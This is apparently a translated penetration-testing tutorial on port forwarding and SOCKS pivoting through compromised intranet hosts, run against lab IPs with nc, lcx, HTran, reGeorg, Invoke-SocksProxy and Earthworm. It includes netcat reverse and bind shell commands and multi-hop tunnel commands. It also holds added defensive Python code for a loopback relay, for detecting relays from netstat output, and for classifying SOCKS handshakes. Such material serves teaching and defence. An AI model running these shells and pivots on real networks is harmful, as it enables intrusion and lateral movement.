0x01 What is port forwarding
Port forwarding, sometimes called tunnelling, is a technique SSH uses for secure network communication. It forwards a network port from one network node to another, so that an external user can reach a port on a private internal IP address (inside the LAN) through a NAT router on which it is enabled.
In plain words: port forwarding means forwarding a port, either a port on the local machine or a port on any host the local machine can reach, to any reachable IP, usually a public IP.
0x02 What is port mapping
Port mapping is a form of NAT: it translates an address on the public network into a private address. An ADSL broadband router running in routing mode has a dynamic or fixed public IP, the ADSL line connects directly to a hub or switch, and all computers share the Internet connection.
In plain words: port mapping maps an intranet port onto a port on the public network. Suppose my own computer sits in an intranet with no public IP address, but I want to expose a port for others to use: that is port mapping.
0x03 Distinguishing port mapping from port forwarding
Port mapping scenario:
External host A wants to access a service on internal host B.
Port forwarding scenario:
External host A can access any port on internal host B, but cannot access a port on internal host C.
In that case the port on host C can be connected to a port on host B; when external host A then accesses that port on B, it is equivalent to accessing the port on C.
Conclusion:
Port forwarding and port mapping work on the same principle; only the application scenarios differ. Forwarding a local port to a port on a remote host can be called either port mapping or port forwarding. See the figure below [note the text on the figure].
Forwarding a port of any IP that this computer can reach to a port on another server is what we call port forwarding. See the figure below [note the text on the figure].
0x04 Distinguishing forward connections from reverse connections
- Forward connection: your machine connects to the target machine
- Reverse connection: the target machine connects back to your machine
- Whether mapping or forwarding, both forward and reverse variants exist, and the principle is the same
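The claim that mapping and forwarding share one principle, shown as an added example that is not part of the original post: a minimal Python relay in the style of the "tran" mode described later (accept on a local port, open a second connection to the target, copy bytes in both directions), run against a local echo server that stands in for the internal service. Hosts, ports and the echo service are assumptions constructed for the demo; everything stays on loopback. The point for a defender is that, at the protocol level, the relayed port is indistinguishable from the service behind it, which is why host-side triage has to look at which process owns the sockets rather than at port numbers.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF to the other side
        except OSError:
            pass


def _listener(host="127.0.0.1"):
    """Bind a TCP listener on an OS-chosen loopback port (constructed test setup)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind((host, 0))
    sock.listen(5)
    return sock


def start_echo_server():
    """Stand-in for the internal service (host C in the text): echoes what it receives."""
    srv = _listener()

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listener closed
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def start_relay(target_host, target_port):
    """The 'tran' pattern (host B in the text): accept locally, dial the target, pump both ways."""
    lst = _listener()

    def serve():
        while True:
            try:
                client, _ = lst.accept()
            except OSError:
                return
            upstream = socket.create_connection((target_host, target_port))
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return lst


def round_trip(host, port, payload):
    """Connect, send payload, half-close, and collect everything the peer sends back."""
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def demo(payload=b"hello through the relay"):
    """Return (direct reply, reply via relay); both are equal when the relay is transparent."""
    echo = start_echo_server()
    echo_port = echo.getsockname()[1]
    relay = start_relay("127.0.0.1", echo_port)
    relay_port = relay.getsockname()[1]
    direct = round_trip("127.0.0.1", echo_port, payload)
    via_relay = round_trip("127.0.0.1", relay_port, payload)
    echo.close()
    relay.close()
    return direct, via_relay


if __name__ == "__main__":
    d, r = demo()
    print("direct:   ", d)
    print("via relay:", r)
```

Run it as a script and the two lines print the same bytes; the relay port and the echo port differ, but a client cannot tell them apart. A reverse ("slave") variant differs only in who opens the TCP connections, not in the pumping loop.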
0x05 Port forwarding and proxy tools
- lcx
- HTran
- netcat
0x06 Environment topology
Host A: Windows 7
Host B: Windows 7
Host C: Windows XP
0x07 NC
NC usage
2. NC reverse connection, network environment assumption:
A is on the external network and cannot reach intranet host B [A is the attacker on the external network]
B is on the intranet and can reach external host A
A: 192.168.0.226
B: 192.168.32.130
Suited to an NC reverse connection: this bounces the shell of intranet host B out to external host A.
Execute on external host A: nc -nvlp 7777
Execute on intranet host B: nc -e cmd 192.168.0.226 7777
Assume here that a shell on B has already been obtained and nc has been uploaded to it.
Output on host A:
3. NC forward connection, network environment assumption:
A is on the intranet and can reach external host B [A is the attacker on the intranet]
B is on the external network and cannot reach intranet host A
Suited to an NC forward connection: this also bounces the shell of intranet host A to external host B.
Execute on intranet host A: nc -l -p 5555 -e cmd.exe
Execute on external host B: nc -nvv 192.168.0.226 5555
4.
If the client [the intranet side] connects to the server [the external side] and wants the server's shell, that is called a forward shell; if the client connects to the server and the server wants the client's shell, that is called a reverse shell.
nc is famous as the Swiss Army knife of network security: beyond bouncing shells it can forward ports, chat, and more.
0x08 LCX
LCX usage:
LCX port mapping, environment assumption:
A is on the external network and cannot reach intranet host B [A is the attacker on the external network]
B is on the intranet and can reach external host A
Execute on intranet host B: lcx.exe -slave 192.168.0.226 7777 192.168.32.132 3389
This forwards port 3389 on the intranet host (192.168.32.132) to port 7777 on the public host (192.168.0.226).
Execute on external host A: lcx.exe -listen 7777 5555
This listens on port 7777 of the local host and relays it to port 5555.
Now opening a remote desktop connection to 127.0.0.1:5555 on host A is equivalent to connecting to port 3389 on B.
LCX port forwarding, environment assumption:
A (external network) can reach B
B (intranet) can reach C
A cannot reach C
Host A IP: 192.168.0.226
Host B IP: 192.168.32.130
Host C IP: 192.168.32.135
Execute on intranet host B: lcx.exe -tran 7777 192.168.32.135 3389
This forwards port 3389 of host C to port 7777 of host B.
Now accessing port 7777 on host B is equivalent to accessing port 3389 on host C.
Running mstsc against 192.168.32.130:7777 on host A, or against 127.0.0.1:7777 on host B, reaches port 3389 of C.
Explanation
LCX is mostly used on compromised hosts ("broilers") inside an intranet. When the attacker wants to manage one through a remote terminal, they typically enable 3389 on it and then forward that port out with lcx.
0x09 HTRAN
HTRAN usage
HTran usage, scenario I
B is on the public network
A can reach B directly [B has 3389 enabled, but B's firewall blocks connections to 3389]
B can also reach A
Host A IP: 192.168.0.226
Host B IP: 192.168.32.130
Host C IP: 192.168.32.135
Method 1:
Execute on host B: htran2.4.exe -p -tran 7777 127.0.0.1 3389
This relays B's port 3389 to port 7777 of the same machine.
Host A then opens a remote desktop connection to 192.168.32.130:7777.
Method 2:
Listen on host A: htran2.4.exe -p -listen 8888 9999
This listens on local port 8888 and relays its traffic to port 9999.
Execute on host B: htran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389
This forwards local port 3389 to port 8888 on A.
A remote desktop connection to local port 9999 on host A then reaches port 3389 on B.
HTran usage, scenario II
Host B is on the public network
Host C is on the intranet behind B
A can reach B but not C
Host A IP: 192.168.0.226
Host B IP: 192.168.32.130
Host C IP: 192.168.32.135
Method 1:
Execute on host B: htran2.4.exe -p -tran 8888 192.168.32.135 3389
This forwards port 3389 of host C to port 8888 of host B.
A connecting to port 8888 on B is now equivalent to connecting to port 3389 on C.
Method 2:
Listen on host B: htran2.4.exe -p -listen 7777 9999
This listens on port 7777 of host B and relays the traffic to port 9999.
Execute on host C: htran2.4.exe -p -slave 192.168.32.130 7777 127.0.0.1 3389
This forwards port 3389 of C to port 7777 on B.
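A defender-side check for the footprint that the lcx and HTran modes above leave on a host, as an added example that is not part of the original post and not code from either tool: it parses the output of Windows `netstat -ano` and flags processes whose socket set has a relay shape, either "tran/listen" (one process both accepting a connection on a port it listens on and dialling out) or "slave" (one process dialling two peers, one inside the internal ranges and one outside). The netstat text is constructed to mirror the lcx scenarios above (B at 192.168.32.130 relaying to 192.168.32.135:3389, and a second process bouncing to 192.168.0.226:7777 while reaching 192.168.32.132:3389); the internal ranges are an assumed parameter. It is a triage heuristic, not a verdict: legitimate proxies, browsers and RDP gateways match the same shape, so the next step is checking which image owns each flagged PID.

```python
import ipaddress
from collections import defaultdict

# Constructed sample in the layout of Windows `netstat -ano`; not real capture data.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1024
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       4321
  TCP    192.168.32.130:7777    192.168.0.226:51002    ESTABLISHED     4321
  TCP    192.168.32.130:51003   192.168.32.135:3389    ESTABLISHED     4321
  TCP    192.168.32.130:51010   192.168.0.226:7777     ESTABLISHED     5555
  TCP    192.168.32.130:51011   192.168.32.132:3389    ESTABLISHED     5555
  TCP    192.168.32.130:51020   192.168.32.50:445      ESTABLISHED     6001
  UDP    0.0.0.0:5355           *:*                                    2000
"""


def parse_netstat(text):
    """Parse the TCP rows of `netstat -ano` into dicts; headers and UDP rows are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        lhost, lport = parts[1].rsplit(":", 1)
        fhost, fport = parts[2].rsplit(":", 1)
        rows.append({"pid": int(parts[4]), "state": parts[3],
                     "lhost": lhost, "lport": int(lport),
                     "fhost": fhost, "fport": int(fport)})
    return rows


def find_relay_candidates(rows, internal_nets):
    """Return {pid: reason} for processes whose socket set matches a port-relay shape."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]

    def is_internal(host):
        try:
            return any(ipaddress.ip_address(host) in n for n in nets)
        except ValueError:  # '*' or a hostname
            return False

    by_pid = defaultdict(list)
    for r in rows:
        by_pid[r["pid"]].append(r)

    findings = {}
    for pid, conns in by_pid.items():
        listening = {c["lport"] for c in conns if c["state"] == "LISTENING"}
        established = [c for c in conns if c["state"] == "ESTABLISHED"]
        # server side: local port is one this process listens on; client side: anything else
        accepted = [c for c in established if c["lport"] in listening]
        dialled = [c for c in established if c["lport"] not in listening]
        if accepted and dialled:
            findings[pid] = "tran/listen shape: accepts on %s, dials out to %s" % (
                sorted({c["lport"] for c in accepted}),
                sorted({"%s:%d" % (c["fhost"], c["fport"]) for c in dialled}))
            continue
        peers = {c["fhost"] for c in dialled}
        if len(peers) >= 2 and any(is_internal(p) for p in peers) \
                and any(not is_internal(p) for p in peers):
            findings[pid] = "slave shape: dials both internal and external peers %s" % sorted(peers)
    return findings


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for pid, why in sorted(find_relay_candidates(rows, ["192.168.32.0/24"]).items()):
        print(pid, why)
```

On the sample, PID 4321 is reported as the tran/listen shape and PID 5555 as the slave shape, while the plain RDP listener (1024) and the single SMB client (6001) are not reported. The `-listen` mode on the external host is not covered: there the relay process only accepts connections, so it looks like any server until its two inbound flows are paired by traffic timing.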
0x01 What is a proxy
A proxy (network proxy) is a special network service that lets one network endpoint (usually the client) connect indirectly to another network endpoint (usually the server) through the service. Some network devices such as gateways and routers provide proxy functionality. Proxy services are generally considered helpful for protecting the privacy or security of endpoints and for preventing attacks.
0x02 Proxy categories
HTTP proxy
SOCKS proxy
FTP proxy
Telnet proxy
SSL proxy
0x03 Distinguishing forward proxies from reverse proxies
With a forward proxy, the proxy and the client sit in the same LAN and the proxy is transparent to the server; with a reverse proxy, the proxy and the server sit in the same LAN and the proxy is transparent to the client. In the first case the proxy stands in for the client, in the second it stands in for the server.
Note: hand-drawn diagram, please be gentle.
0x04 reGeorg + proxychains proxy
reGeorg is the successor to reDuh. It forwards ports of an intranet server to the local machine through an HTTP/HTTPS tunnel.
Choose the server script matching the target's platform and upload it to host B; here that is the PHP script.
Requesting the file returns "Georg says, 'All seems fine'", meaning the tunnel endpoint is working.
Then run the reGeorgSocksProxy.py script [the urllib3 module is required]: python2 reGeorgSocksProxy.py -u "http://192.168.32.130/tunnel.php" -p 8888
The command line also reports "All seems fine".
Next, use the Proxifier tool:
Add a proxy server first
Configure the proxy rules
Select the remote desktop program mstsc here
Connect to the remote desktop
The traffic can be seen passing through the proxy
0x05 SOCKS4/5 proxy based on PowerShell
Using Invoke-SocksProxy, https://github.com/p3nt4/Invoke-SocksProxy
Invoke-SocksProxy usage
Invoke-SocksProxy usage, method 1
Win10 host IP: 192.168.192.130
Win7 host IP: 192.168.192.129
Setting up a SOCKS4/5 proxy
First run PowerShell with administrator privileges on the Win10 host. If you are told that script execution is disabled, enter "Set-ExecutionPolicy RemoteSigned".
Enter Import-Module .\Invoke-SocksProxy.psm1 to import the module
Enter Invoke-SocksProxy -bindPort 1234 to create a SOCKS proxy on port 1234
Next, use SOCKS client software on the Win7 host to reach the Internet through port 1234 on the Win10 host
This time I use SocksCap; proxychains works just as well
Click File, choose Settings, set the SOCKS server IP and port, and click Apply to confirm
Click New to choose the program that should go through the proxy; I choose Firefox here
Click Run and visit Baidu
In the window on the Win10 host you can see that the connection has succeeded
Invoke-SocksProxy usage, method 2
Threaded mode: enter Invoke-SocksProxy -bindPort 1234 -threads 400
If -bindPort is omitted, the default port is 1080
0x06 Earthworm
EW (Earthworm) is a set of portable network penetration tools with two core functions, SOCKSv5 service setup and port forwarding, for completing network penetration in complex network environments.
Note: this tool is no longer updated or available for download.
Earthworm usage
The following is a schematic diagram:
The tool can open a network tunnel into the depths of a network in "forward", "reverse" or "multi-level cascade" fashion, breaking through network restrictions with the earthworm's own means and loosening the soil for the firewall.
The toolkit provides a variety of executables for different operating systems: Linux, Windows, macOS and ARM Linux are all included. Support for more platforms is still being maintained; please wait.
Usage:
In all of the following examples, unless stated otherwise, the proxy port is 1080 and the service is a SOCKSv5 proxy.
The tool has six command formats (ssocksd, rcsocks, rssocks, lcx_slave, lcx_listen, lcx_tran).
- Forward SOCKSv5 server
$ ./ew -s ssocksd -l 1080
- Bounce (reverse) SOCKSv5 server
This operation takes two steps:
a) First, run the following on a host A that has a public IP:
$ ./ew -s rcsocks -l 1080 -e 8888
b) Start the SOCKSv5 service on target host B and bounce it to port 8888 of the public host:
$ ./ew -s rssocks -d 1.1.1.1 -e 8888
Success.
- Multi-level cascade
The tool has three port forwarding commands. Their parameter formats are as follows:
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
With these port forwarding commands, TCP-based services deep inside the network, such as SOCKSv5, can be forwarded out to the root.
First, two local SOCKS test samples of a "two-level cascade":
a) Usage of lcx_tran
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) Usage of lcx_listen and lcx_slave
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
Another "three-level cascade" local SOCKS test case for reference:
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Data flow: SOCKSv5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
Note: the content above is from the README on the official website or shipped with the tool.
Earthworm usage method 1 [forward proxy]
Win7 host IP: 192.168.192.1
Win7 host IP: 192.168.192.9
The target network boundary has a public IP and can open any listening port:
+---------+      +-----------------------+
|HackTools| ->>  | 7777 -> 192.168.192.9 |
+---------+      +-----------------------+
Execute: ew_for_win_32.exe -s ssocksd -l 7777
On the Win7 host 192.168.192.9, this command opens a SOCKS proxy on port 7777.
Next, tools such as SocksCap or proxychains can be pointed at the proxy port. I already covered that above, so I will just show the screenshot of the demonstration.
Note: this is a forward proxy. The proxy client is the hacker's machine, and the compromised machine being connected to plays the server role.
Earthworm usage method 2 [reverse proxy]
Win7 x32 host IP: 192.168.0.75 [hack machine]
Win7 host IP: 192.168.0.226 [public network machine]
Win7 host IP: 192.168.192.9 [intranet]
The target network boundary has no public IP address, so the SOCKS proxy has to be created by bouncing it out:
                                                                192.168.192.9
              controllable public-IP host                controllable internal host
+---------+   +--------------------------------+     |     +-----------------+
|HackTools| ->| 1089 -> 192.168.0.226 -> 9999  | firewall | <- 192.168.0.75 |
+---------+   +--------------------------------+     |     +-----------------+
On the public network host [VPS], execute: ew_for_win_32.exe -s rcsocks -l 1089 -e 9999
This adds a relay tunnel on the public host 192.168.0.226: proxy requests received on port 1089 are passed to the host that connects back to port 9999.
Execute on the intranet host [controlled compromised machine]: ew_for_win_32.exe -s rssocks -d 192.168.0.226 -e 9999
This connects the controlled intranet host of the target network back to the public host.
Next, point SocksCap or proxychains at 192.168.0.226:1089 to use the SOCKS5 proxy service provided by the rssocks host.
Earthworm usage method 3
Win7 host IP: 192.168.192.1 [hack machine]
Win7 host IP: 192.168.192.9 [A]
Win7 host IP: 192.168.192.11 [B]
Control of two hosts A and B in the target network has been obtained, as follows:
Host A: has a public IP address and can open any listening port freely, but cannot access the specific resources
Host B: internal host of the target network; it can access the specific resources but cannot reach the public network
Host A can connect directly to host B
The controllable boundary host A can reach host B, which holds the specified resources:
+---------+      +-----------------------+      +------------------------+
|HackTools| ->>  | 1099 -> 192.168.192.9 | ->>  | 7777 -> 192.168.192.11 |
+---------+      +-----------------------+      +------------------------+
Execute on host B: ew_for_win_32.exe -s ssocksd -l 7777
This starts a SOCKS proxy on port 7777 of host B in ssocksd mode.
Execute on host A: ew_for_win_32.exe -s lcx_tran -l 1099 -f 192.168.192.11 -g 7777
This relays the SOCKS proxy requests received on the listening port (1080 in the README wording, 1099 here) to port 7777 of host B.
Next, point SocksCap or proxychains at 192.168.192.9:1099 to use the SOCKS5 proxy service provided by host B.
Screenshot of the proxy succeeding:
Earthworm usage method 4
Win7 host IP: 192.168.192.1 [hack machine]
Win7 host IP: 192.168.192.9 [A]
Win7 host IP: 192.168.192.10 [public network machine]
Win7 host IP: 192.168.192.13 [B]
Control of two hosts A and B in the target network has been obtained, as follows:
Host A: the boundary host of the target network; it has no public IP address and cannot access the specific resources.
Host B: the internal host of the target network; it can access the specific resources but cannot connect back to the public network.
Host A can connect directly to host B
- Execute on the public host: ew_for_win_32.exe -s lcx_listen -l 1099 -e 8888
This adds a relay tunnel on the public host 192.168.192.10: proxy requests received on the listening port (1080 in the README wording, 1099 here) are passed to the host that connects back to port 8888.
- Execute on host B: ew_for_win_32.exe -s ssocksd -l 9999
On host 192.168.192.13 [B], this starts a SOCKS proxy on port 9999 in ssocksd mode.
- Execute on host A: ew_for_win_32.exe -s lcx_slave -d 192.168.192.10 -e 8888 -f 192.168.192.13 -g 9999
On 192.168.192.9, this opens a communication tunnel between 192.168.192.10:8888 and 192.168.192.13:9999 using the tool's lcx_slave mode.
- HackTools can now use the SOCKS5 proxy provided by host 192.168.192.13 by connecting to 192.168.192.10:1099
Screenshot of success:
[Screenshot: panels labelled B, public network, A, hack machine]
Note: as highlighted in red, host B in my lab cannot reach the Internet, as expected.
Summary of Earthworm
The tool currently provides six link states, selected with the -s parameter:
ssocksd rcsocks rssocks
lcx_slave lcx_tran lcx_listen
The core SOCKS5 service logic is provided by ssocksd and rssocks, corresponding to the forward and reverse SOCKS proxies respectively.
The remaining lcx link states are used to open a path between the test host and the SOCKS server.
The lcx family of pipes:
lcx_slave: one end of the pipe connects back to the proxy requester in bounce mode, the other end connects to the host providing the proxy.
lcx_tran: the pipe receives proxy requests by listening on a local port and relays them to the host providing the proxy.
lcx_listen: the pipe receives data by listening on a local port and relays it to the proxy-providing host that has connected back from the target network.
By combining the characteristics of the lcx family of pipes, penetration testing in multi-layer intranet environments can be achieved.
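What the SOCKS service that ssocksd, rssocks and Invoke-SocksProxy expose actually looks like on the wire, as an added example that is not from the original post or from either tool: a small parser for the unauthenticated SOCKS5 handshake (RFC 1928) and the SOCKS4 request that a sensor or a packet-capture review can apply to the first bytes of any TCP stream, since the examples above place proxies on 1080, 1234, 7777 and 9999 alike and a port-based rule would miss most of them. The byte strings are constructed for the demo. The classifier checks both directions because a reverse layout (rssocks style) leaves the SOCKS server on the host that opened the TCP connection, so the client greeting arrives from the TCP responder; that the relay passes the SOCKS bytes through unchanged is an assumption here, not something verified against EW's wire format.

```python
import struct

# Constructed sample streams (first bytes sent by each side); not captured from any tool.
SOCKS5_CLIENT = (b"\x05\x01\x00"                         # greeting: v5, 1 method, NO AUTH
                 + b"\x05\x01\x00\x01"                   # request: v5, CONNECT, RSV, ATYP=IPv4
                 + bytes([192, 168, 32, 135]) + struct.pack("!H", 3389))
SOCKS5_SERVER = b"\x05\x00" + b"\x05\x00\x00\x01" + b"\x00" * 6   # method chosen; reply: succeeded
SOCKS4_CLIENT = b"\x04\x01" + struct.pack("!H", 3389) + bytes([192, 168, 32, 135]) + b"ew\x00"
SOCKS4_SERVER = b"\x00\x5a" + b"\x00" * 6                # VN=0, CD=0x5a request granted
HTTP_CLIENT = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
HTTP_SERVER = b"HTTP/1.1 200 OK\r\n\r\n"

SOCKS5_CMDS = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}


def parse_socks5(client, server):
    """Parse a SOCKS5 greeting/method reply and, if no auth was chosen, the request that follows."""
    if len(client) < 3 or client[0] != 0x05:
        return None
    nmethods = client[1]
    methods = list(client[2:2 + nmethods])
    if nmethods == 0 or len(methods) != nmethods or len(server) < 2 or server[0] != 0x05:
        return None
    chosen = server[1]
    info = {"version": 5, "auth_methods": methods, "chosen": chosen, "target": None}
    req = client[2 + nmethods:]
    if chosen != 0x00 or len(req) < 4 or req[0] != 0x05 or req[2] != 0x00:
        return info  # auth negotiated or request not yet seen: still a SOCKS5 handshake
    cmd, atyp = req[1], req[3]
    if atyp == 0x01 and len(req) >= 10:                  # IPv4 address
        host = ".".join(str(b) for b in req[4:8])
        port = struct.unpack("!H", req[8:10])[0]
    elif atyp == 0x03 and len(req) >= 5 and len(req) >= 7 + req[4]:   # domain name
        n = req[4]
        host = req[5:5 + n].decode("ascii", "replace")
        port = struct.unpack("!H", req[5 + n:7 + n])[0]
    else:
        return info
    info["target"] = (SOCKS5_CMDS.get(cmd, str(cmd)), host, port)
    return info


def parse_socks4(client, server):
    """Parse a SOCKS4 CONNECT/BIND request (VN=4) and its reply (VN=0, CD=0x5a means granted)."""
    if len(client) < 9 or client[0] != 0x04 or client[1] not in (1, 2):
        return None
    if len(server) < 2 or server[0] != 0x00:
        return None
    port = struct.unpack("!H", client[2:4])[0]
    host = ".".join(str(b) for b in client[4:8])
    nul = client.find(b"\x00", 8)
    if nul < 0:
        return None
    return {"version": 4, "userid": client[8:nul].decode("ascii", "replace"),
            "granted": server[1] == 0x5a,
            "target": ("CONNECT" if client[1] == 1 else "BIND", host, port)}


def classify_stream(initiator, responder):
    """Classify a TCP stream from the first bytes in each direction; None if not SOCKS.

    Both orderings are tried: in a reverse SOCKS setup the SOCKS client speaks from the
    side that accepted the TCP connection, so `socks_client_is` records which side it was.
    """
    orderings = (("initiator", initiator, responder), ("responder", responder, initiator))
    for speaker, c, s in orderings:
        for parser in (parse_socks5, parse_socks4):
            info = parser(c, s)
            if info:
                info["socks_client_is"] = speaker
                return info
    return None


if __name__ == "__main__":
    print(classify_stream(SOCKS5_CLIENT, SOCKS5_SERVER))
    print(classify_stream(SOCKS5_SERVER, SOCKS5_CLIENT))   # reverse layout
    print(classify_stream(SOCKS4_CLIENT, SOCKS4_SERVER))
    print(classify_stream(HTTP_CLIENT, HTTP_SERVER))
```

The recovered `target` is the useful field for a responder: a CONNECT to an internal RDP or SMB port inside a stream that crossed the network boundary is the cascade in the data-flow line above seen from the outside.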